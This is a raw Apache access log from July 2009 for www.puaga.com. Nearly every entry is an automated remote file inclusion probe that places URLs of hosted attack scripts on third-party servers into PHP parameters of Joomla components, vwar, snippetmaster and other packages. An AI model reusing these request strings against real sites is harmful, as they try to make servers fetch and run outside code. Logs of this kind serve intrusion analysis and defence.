82.194.87.219 - - [05/Jul/2009:07:39:55 -0700] "GET /logs//main.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:42:06 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:42:06 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:42:07 -0700] "GET /logs/access_090605.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:42:07 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:42:07 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:42:07 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:42:10 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:42:10 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:42:10 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:42:10 -0700] "GET /logs/access_090605.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:42:10 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:42:10 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:42:11 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:42:11 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:42:11 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:42:11 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:42:12 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:42:12 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:42:15 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:42:15 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:42:16 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:42:16 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:42:16 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:42:16 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:42:21 -0700] "GET /logs/access_090605.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:42:21 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:42:21 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:42:28 -0700] "GET /logs/access_090529.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.245.179 - - [05/Jul/2009:07:42:31 -0700] "GET /logs/access_090523.log%20//modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.109.245.179 - - [05/Jul/2009:07:42:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.109.245.179 - - [05/Jul/2009:07:42:31 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:42:34 -0700] "GET /logs/access_090529.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.245.179 - - [05/Jul/2009:07:42:36 -0700] "GET /logs/access_090523.log%20//modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.109.245.179 - - [05/Jul/2009:07:42:36 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.109.245.179 - - [05/Jul/2009:07:42:36 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:42:39 -0700] "GET /logs/access_090529.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:43:28 -0700] "GET /logs/access_090529.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.242.110.197 - - [05/Jul/2009:07:43:28 -0700] "GET /logs/access_090510.log/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.242.110.197 - - [05/Jul/2009:07:43:28 -0700] "GET /main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.242.110.197 - - [05/Jul/2009:07:43:28 -0700] "GET /logs/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.242.110.197 - - [05/Jul/2009:07:43:37 -0700] "GET /main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.242.110.197 - - [05/Jul/2009:07:43:37 -0700] "GET /logs/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.242.110.197 - - [05/Jul/2009:07:43:37 -0700] "GET /logs/access_090510.log/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:44:23 -0700] "GET /logs/access_090529.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:44:46 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:44:46 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:44:46 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:44:53 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:44:53 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:44:53 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:45:01 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:45:01 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:45:02 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.65.112 - - [05/Jul/2009:07:45:06 -0700] "GET /logs/access_090529.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:45:14 -0700] "GET /logs/access_090529.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.242.110.197 - - [05/Jul/2009:07:45:23 -0700] "GET /logs/access_090621.log%20%20/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.242.110.197 - - [05/Jul/2009:07:45:23 -0700] "GET /logs/access_090510.log%20%20/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:45:24 -0700] "GET /logs/access_090529.log%20%20/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.242.110.197 - - [05/Jul/2009:07:45:37 -0700] "GET /logs/access_090510.log%20%20/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:45:49 -0700] "GET /logs/access_090529.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.242.110.197 - - [05/Jul/2009:07:45:51 -0700] "GET /logs/access_090621.log%20%20/main.php?pagina=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:46:11 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:46:11 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:46:12 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.79" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:46:12 -0700] "GET /logs/access_090510.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:46:12 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:46:12 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:46:28 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:46:28 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.79" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:46:30 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.79" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:47:14 -0700] "GET /logs/access_090605.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:47:14 -0700] "GET /?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.79" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:47:17 -0700] "GET /logs/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 4799 "-" "libwww-perl/5.79" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:47:22 -0700] "GET /logs/access_090510.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:47:33 -0700] "GET /oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:47:33 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:47:37 -0700] "GET /logs/access_090616.log//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:47:48 -0700] "GET /logs/access_090619.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:48:05 -0700] "GET /logs/access_090616.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:48:05 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:48:06 -0700] "GET /oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:07:48:10 -0700] "GET /logs/access_090517.log//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:07:48:10 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:07:48:10 -0700] "GET /include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:07:48:10 -0700] "GET /include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:07:48:10 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:07:48:10 -0700] "GET /logs/access_090517.log//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:07:48:35 -0700] "GET /logs/access_090511.log//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:07:48:38 -0700] "GET /logs/access_090511.log//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:49:06 -0700] "GET /logs/access_090529.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
119.63.193.62 - - [05/Jul/2009:07:49:19 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:49:23 -0700] "GET /logs/access_090614.log/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:49:23 -0700] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:49:23 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
84.51.241.6 - - [05/Jul/2009:07:49:26 -0700] "GET /logs/access_090529.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:07:50:05 -0700] "GET /logs/access_090510.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:07:50:05 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:07:50:05 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:07:50:11 -0700] "GET /logs/access_090620.log/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
66.46.177.182 - - [05/Jul/2009:07:50:19 -0700] "GET /logs/access_090529.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
66.46.177.182 - - [05/Jul/2009:07:50:19 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
66.46.177.182 - - [05/Jul/2009:07:50:19 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
66.46.177.182 - - [05/Jul/2009:07:50:28 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
66.46.177.182 - - [05/Jul/2009:07:50:30 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
66.46.177.182 - - [05/Jul/2009:07:50:34 -0700] "GET /logs/access_090526.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
66.46.177.182 - - [05/Jul/2009:07:50:34 -0700] "GET /logs/access_090529.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
66.46.177.182 - - [05/Jul/2009:07:50:40 -0700] "GET /logs/access_090526.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
87.230.9.68 - - [05/Jul/2009:07:50:45 -0700] "GET /logs/access_090519.log//include/print_category.php?setup[use_category]=1&dir=http://www.krob.de/bilder/Bildb?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
87.230.9.68 - - [05/Jul/2009:07:50:45 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
87.230.9.68 - - [05/Jul/2009:07:50:46 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
